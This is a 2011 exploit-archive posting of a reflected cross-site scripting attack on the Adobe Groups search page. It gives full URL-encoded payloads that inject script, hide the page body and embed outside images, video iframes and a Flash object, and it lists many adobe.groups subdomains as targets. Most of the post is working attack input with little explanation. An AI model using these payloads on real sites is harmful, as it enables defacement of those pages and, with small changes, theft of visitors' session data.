exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Adobe Groups Cross Site Scripting

Adobe Groups Cross Site Scripting
Posted Sep 6, 2011
Authored by Sony

Adobe Groups suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 1b443f2aa9acfe0a5279a5cc708ab5b3eb09a22f8d900bb72c27d01b4a75a93f

Adobe Groups Cross Site Scripting

Change Mirror Download
;)

# Exploit Title: Adobe Groups Cross Site Scripting
# Date: 30.08.2011
# Author: Sony
# Software Link: http://groups.adobe.com/
# Blog: http://st2tea.blogspot.com/

..................................................................

Well, we can see:

http://xssed.com/mirror/71488/

Don't work and it's sadly..omg!

But..

Let's Go:

http://ria.groups.adobe.com/index.cfm?event=group.search&groupid=534

Use Live HTTP Headers:

POST /index.cfm?event=group.search&groupid=1128
keywords=1&lastactivity=Anytime&author=&type=

=1128 keywords=

John + Jane = Love

1128 + keywords = our Way

http://ria.groups.adobe.com/index.cfm?event=group.search&groupid=534&keywords=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28http://i53.tinypic.com/dp8jyv.jpg%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Ciframe%20width=%22560%22%20height=%22345%22%20src=%22http://www.youtube.com/embed/sFYLp-r0ZVA%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E&lastactivity=in+the+last+year&author=&type=

All Adobe Groups:

http://madnet.name/tools/madss/

cpaug.groups.adobe.com
cppug.groups.adobe.com
cpug.groups.adobe.com
creativecrew.groups.adobe.com
creativesuitesanjose.groups.adobe.com
csneworleans.groups.adobe.com
cssierra.groups.adobe.com
cswestmd.groups.adobe.com
daaug.groups.adobe.com
dallasae.groups.adobe.com
dallaspremiere.groups.adobe.com
dalpug.groups.adobe.com
dc-metro.groups.adobe.com
dccfug.groups.adobe.com
dco.groups.adobe.com
ddla.groups.adobe.com
denverflex.groups.adobe.com
denverlivecycle.groups.adobe.com
derbyaug.groups.adobe.com
desmoines.groups.adobe.com

etc..

So..what can we do?

I don't know..let's go dance!

http://nasa.groups.adobe.com/index.cfm?event=group.search&groupid=1128&keywords=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28http://th1192.photobucket.com/albums/aa321/Albertlinux/fundos/th_matrix.gif%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3COBJECT%20width=%22470%22%20height=%22353%22%3E%3CPARAM%20name=%22movie%22%20value=%22http://video.rutube.ru/7a7148f0f6c5f92ae195cccd72dff454%22%3E%3C/PARAM%3E%3CPARAM%20name=%22wmode%22%20value=%22window%22%3E%3C/PARAM%3E%3CPARAM%20name=%22allowFullScreen%22%20value=%22true%22%3E%3C/PARAM%3E%3CEMBED%20src=%22http://video.rutube.ru/7a7148f0f6c5f92ae195cccd72dff454%22%20type=%22application/x-shockwave-flash%22%20wmode=%22window%22%20width=%22470%22%20height=%22353%22%20allowFullScreen=%22true%22%20%3E%3C/EMBED%3E%3C/OBJECT%3E&lastactivity=in+the+last+year&author=&type=
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close